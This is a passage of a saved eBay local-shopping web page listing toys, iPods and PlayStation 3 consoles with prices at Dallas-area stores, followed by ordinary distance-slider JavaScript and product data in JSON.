</div><div class="price"><span class="price">$249.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18288611" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/882/634/200/11882095_19132634_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18288611&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Sesame Street Let's Rock Elmo Guitar'>Sesame Street Let's Rock Elmo Guitar</a>
</div><div class="price"><span class="price">$19.89</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="4058468" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/004/227/979/200/4227039_6196979_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=4058468&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Apple.. - iPod nano.. 8GB* MP3 Player (6th Generation - Latest Model) - Green'>Apple.. - iPod nano.. 8GB* MP3 Player (6th Generation - Latest Model) - Green</a>
</div><div class="price"><span class="price">$124.99<span class="sep">-</span>$129.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="7925709" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/008/961/642/200/8961116_10370642_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=7925709&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Playstation 3 250GB Sony Refurbished for PlayStation 3'>Playstation 3 250GB Sony Refurbished for PlayStation 3</a>
</div><div class="price"><span class="price">$199.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="5721765" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/004/227/926/200/4227003_5479926_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=5721765&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Apple.. - iPod touch.. 8GB* MP3 Player (4th Generation - Latest Model) - Black'>Apple.. - iPod touch.. 8GB* MP3 Player (4th Generation - Latest Model) - Black</a>
</div><div class="price"><span class="price">$199.99<span class="sep">-</span>$229.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="4224424" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/004/227/964/200/4227028_5473964_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=4224424&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Apple.. - iPod nano.. 8GB* MP3 Player (6th Generation - Latest Model) - Graphite'>Apple.. - iPod nano.. 8GB* MP3 Player (6th Generation - Latest Model) - Graphite</a>
</div><div class="price"><span class="price">$119.00<span class="sep">-</span>$129.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="13920082" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/153/025/200/13153770_16782025_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=13920082&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Sesame Street Let's Rock Elmo Guitar'>Sesame Street Let's Rock Elmo Guitar</a>
</div><div class="price"><span class="price">$19.99<span class="sep">-</span>$21.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16678652" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/460/692/200/11460478_18910692_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16678652&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='LeapFrog Explorer Learning Game Scooby-Doo! Pirate Ghost of the Barbary Coast'>LeapFrog Explorer Learning Game Scooby-Doo! Pirate Ghost of the Barbary Coast</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19245844" coords="32.858293,-96.749841,6911,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/107/177/200/14107202_17465177_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19245844&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='AEO Earbud Earmuffs'>AEO Earbud Earmuffs</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17322161" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/012/146/726/200/12146362_16111726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17322161&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Let's Rock Elmo with Bonus Guitar'>Let's Rock Elmo with Bonus Guitar</a>
</div><div class="price"><span class="price">$49.98</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16581138" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/363/149/200/11363168_18115149_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16581138&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='LeapFrog Explorer Learning Game Disney Tangled'>LeapFrog Explorer Learning Game Disney Tangled</a>
</div><div class="price"><span class="price">$24.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16587939" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/356/408/200/11356422_18865408_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16587939&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='LeapFrog Explorer Learning Game Ni Hao, Kai-lan Super Happy Day!'>LeapFrog Explorer Learning Game Ni Hao, Kai-lan Super Happy Day!</a>
</div><div class="price"><span class="price">$24.09</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16822893" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/611/542/200/11611736_15481542_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16822893&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Playstation 3 Entertainment System - 160GB (Playstation 3)'>Playstation 3 Entertainment System - 160GB (Playstation 3)</a>
</div><div class="price"><span class="price">$249.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="3205208" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/003/264/044/200/3264874_626044_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=3205208&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='PlayStation 3 40GB for PlayStation 3'>PlayStation 3 40GB for PlayStation 3</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="11639993" coords="33.008115,-96.70534,3040,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/069/121/200/11069831_14772121_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=11639993&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Let's Rock Elmo'>Let's Rock Elmo</a>
</div><div class="price"><span class="price">$52.46<span class="sep">-</span>$59.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="2185618" coords="32.938058,-96.748542,3713,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3713.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/002/178/218/200/2178428_7284218_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=2185618&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Apple.. - iPod classic.. 160GB* MP3 Player - Black'>Apple.. - iPod classic.. 160GB* MP3 Player - Black</a>
</div><div class="price"><span class="price">$239.99<span class="sep">-</span>$249.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16541623" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/302/922/200/11302254_19146922_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16541623&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='LeapFrog Explorer Learning Game Disney Pixar Cars 2'>LeapFrog Explorer Learning Game Disney Pixar Cars 2</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="2180105" coords="32.938058,-96.748542,3713,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3713.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/910/738/200/14910837_20338738_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=2180105&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Apple.. - iPod classic.. 160GB* MP3 Player - Silver'>Apple.. - iPod classic.. 160GB* MP3 Player - Silver</a>
</div><div class="price"><span class="price">$239.99<span class="sep">-</span>$249.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19582115" coords="32.68162,-97.111413,13331,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13331.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/458/259/200/14458645_18843259_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19582115&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Playstation 3 160GB Bundle'>Playstation 3 160GB Bundle</a>
</div><div class="price"><span class="price">$299.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19245843" coords="32.858293,-96.749841,6911,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/107/176/200/14107201_17465176_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19245843&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='AEO Earbud Earmuffs'>AEO Earbud Earmuffs</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18378125" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/012/731/187/200/12731828_18562187_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18378125&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='LeapPad & Leapster Explorer Learning Game: Disney Pixar Pals'>LeapPad & Leapster Explorer Learning Game: Disney Pixar Pals</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19245842" coords="32.858293,-96.749841,6911,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/107/175/200/14107200_17465175_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19245842&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='AEO Earbud Earmuffs'>AEO Earbud Earmuffs</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19245845" coords="32.858293,-96.749841,6911,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/107/178/200/14107203_17465178_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19245845&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='AEO Earbud Earmuffs'>AEO Earbud Earmuffs</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17698207" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/559/882/200/13559625_17148882_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17698207&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Sesame Street Let's Rock Elmo'>Sesame Street Let's Rock Elmo</a>
</div><div class="price"><span class="price">$49.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab23d4ae1340a03664168136ff4b32e9");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":19245846,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":13,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":7,"id":7,"name":"4","integer":7},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=19245846&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/014/107/956/200/14107204_20422956_200.jpg","lowPrice":{"valueInMinorUnits":1499,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":14990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":13,"title":"AEO Earbud Earmuffs","offerIds":"14107204","numLocalStore":1,"lowPriceValue":"$14.99","miloProductOfferModel":[{"merchantTitle":"American Eagle","merchantId":6911,"linkUrl":null,"location":{"merchantName":"American Eagle","latitude":32.858293,"merchantLogoUrl":"http://milo.com/images/stores/6911.jpg","longitude":-96.749841},"RTPalUrl":null,"price":{"valueInMinorUnits":1499,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":14990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 54.0px\"><\/span>\n<\/span><span class=\"revCnt\">(13)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":8783898,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=8783898&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/009/910/307/200/9910147_12291307_200.jpg","lowPrice":{"valueInMinorUnits":24999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":249990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"PlayStation 3 160GB Killzone 3 Bundle for PlayStation 3","offerIds":"9910147","numLocalStore":1,"lowPriceValue":"$249.99","miloProductOfferModel":[{"merchantTitle":"Gamestop","merchantId":9386,"linkUrl":null,"location":{"merchantName":"Gamestop","latitude":32.91079,"merchantLogoUrl":"http://milo.com/images/stores/9386.jpg","longitude":-96.95881},"RTPalUrl":null,"price":{"valueInMinorUnits":24999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":249990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":18288611,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=18288611&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/011/882/634/200/11882095_19132634_200.jpg","lowPrice":{"valueInMinorUnits":1989,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19890000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Sesame Street Let's Rock Elmo Guitar","offerIds":"11882095","numLocalStore":1,"lowPriceValue":"$19.89","miloProductOfferModel":[{"merchantTitle":"Target","merchantId":1792,"linkUrl":null,"location":{"merchantName":"Target","latitude":32.9274,"merchantLogoUrl":"http://milo.com/images/stores/1792.jpg","longitude":-96.814},"RTPalUrl":null,"price":{"valueInMinorUnits":1989,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19890000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png"}],"ratingNode":null},{"highPrice":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"highPriceValue":"$129.99","productId":4058468,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":58,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=4058468&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/004/227/979/200/4227039_6196979_200.jpg","lowPrice":{"valueInMinorUnits":12499,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":124990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":58,"title":"Apple.. - iPod nano.. 8GB* MP3 Player (6th Generation - Latest Model) - Green","offerIds":"4227039,5551804,7764781,9089793","numLocalStore":4,"lowPriceValue":"$124.99","miloProductOfferModel":[{"merchantTitle":"Best Buy","merchantId":1779,"linkUrl":null,"location":{"merchantName":"Best 